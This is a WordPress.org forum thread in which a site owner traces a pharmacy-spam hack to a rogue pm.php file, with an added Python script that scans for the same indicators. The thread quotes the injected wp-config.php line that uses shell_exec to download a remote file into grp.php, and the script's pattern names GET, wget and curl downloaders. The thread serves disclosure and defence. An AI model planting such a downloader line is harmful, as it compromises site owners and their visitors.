WordPress.org


Site Hacked - grp.php File (8 posts)

  1. clindsey
    Member
    Posted 4 years ago #

    I got a Google Alert today that showed a pharmacy link with my website. I went out and did a site search through Google and found spammy links and posts with pharmacy and drug type titles.

    I started looking around, and immediately noticed this line at the top of my wp-config.php file:
    <?php shell_exec('/usr/bin/GET http://boiledeggstudios.com/JJ/grp.txt > ./grp.php'); ?>

    I also noticed a new file in my WordPress root directory called grp.php, which contains this (link to WordPress pastebin).

    The links in the Google site search that are pharmacy links redirect off my site to a pharmacy of some kind.

    I'm not sure where the vulnerability is. I'm current on my WordPress install (3.0). And I'm currently working to clean up the damage, and also check my other installs of WordPress.

    I'm not looking for help cleaning up the site, I just wanted to inform everyone to be on the lookout.

  2. clindsey
    Member
    Posted 4 years ago #

    Followup: This doesn't seem to be the Pharma Hack that was described recently. There are no added files in the Akismet plugin folder. None of the malicious code/entries were in my database.

    Besides the config file and grp.php file I described above, the only thing out-of-place I see are some entries in wp-options. The first option in the table is _transient_random_seed. I don't think I've ever seen that before, but I'm not sure; it may not be a sign of the hack. I also noticed entries for _transient_doing_cron and _transient_timeout_feed_mod_a5420c83891a9c88ad2a4f04584a5efc (and there were many similar to that last one).

    I don't see any strange posts in the database, and there are no additional users.

  3. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

  4. clindsey
    Member
    Posted 4 years ago #

    Rev. Voodoo, thanks for the links. I was posting so people can maybe figure out what the vulnerability is and maybe some other users won't get hit by the same attack.

    That said, I think I've found the damaging code. In wp-blog-header.php in the WordPress root folder, I found this at the top (link to WordPress pastebin).

    Taking that out kills the redirects to the pharmacy site.

  5. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    Good find, but now you gotta follow that rabbit down the hole... how did it get there? Also, what allowed that to be written there?

    Perhaps a php file hidden somewhere in your server? Access logs (if available) can sometimes help you see if another file was used to write to that file.

  6. clindsey
    Member
    Posted 4 years ago #

    I think I found it. There is an additional file at /install/wp-includes/pomo/. The file is pm.php.

  7. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    Yep, I definitely don't have that file in a clean install.
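The indicators in this thread (a shell_exec downloader at the top of wp-config.php, a dropped grp.php, and a PHP file under wp-includes/pomo/ that a clean install does not have) can be checked for mechanically. The script below is an added example, not code from the thread or from WordPress; the manifest, the sample file contents and the example.invalid URL in its constructed tree are stand-ins, and a real run would use a manifest generated from an untouched download of the same WordPress version.

```python
"""Added example (not from the thread): scan a WordPress tree for the indicators
described above: a shell_exec downloader in core PHP files, a dropped grp.php,
and PHP files under wp-includes/ or wp-admin/ absent from a clean core checkout."""
import os
import re
import tempfile

# Shape of the one-liner found in wp-config.php: shell_exec fetching a remote URL.
DOWNLOADER_RE = re.compile(r"shell_exec\s*\(.*\b(GET|wget|curl)\b.*https?://", re.I)
CORE_PHP = ("wp-config.php", "wp-blog-header.php", "index.php")

def scan_wordpress_root(root, clean_manifest):
    """Return sorted (relative_path, reason) findings.

    clean_manifest: relative paths of a known-clean install of the same version,
    generated from an untouched download, never from the live site. Only
    wp-includes/ and wp-admin/ are compared, since wp-content/ varies per site."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if rel.startswith(("wp-includes/", "wp-admin/")) and rel not in clean_manifest:
                findings.append((rel, "php file not in clean core manifest"))
            if name == "grp.php":
                findings.append((rel, "dropped grp.php from the downloader line"))
            if rel in CORE_PHP:
                with open(full, errors="replace") as fh:
                    head = fh.read(4096)  # injected code sits at the top of the file
                if DOWNLOADER_RE.search(head):
                    findings.append((rel, "shell_exec downloader in core file"))
    return sorted(findings)

def build_constructed_site():
    """Constructed sample tree mirroring the thread's indicators (not a real site)."""
    root = tempfile.mkdtemp()
    def put(rel, body):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    put("wp-config.php", "<?php shell_exec('/usr/bin/GET http://example.invalid/grp.txt > ./grp.php'); ?>\n<?php define('DB_NAME', 'wp'); ?>")
    put("grp.php", "<?php /* constructed placeholder for the dropped file */ ?>")
    put("wp-includes/pomo/po.php", "<?php // legitimate core file, listed in the manifest ?>")
    put("wp-includes/pomo/pm.php", "<?php // rogue file like the one found in post 6 ?>")
    return root

CLEAN_MANIFEST = {"wp-includes/pomo/po.php"}  # tiny stand-in for a real core listing
```

Run `scan_wordpress_root(build_constructed_site(), CLEAN_MANIFEST)` to see the three findings; on a live site, pass the document root and a manifest built from a fresh download.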

  8. djanym
    Member
    Posted 3 years ago #

    I have the same hacker's code in my WP... I think I got this from some plugin.

Topic Closed

This topic has been closed to new replies.
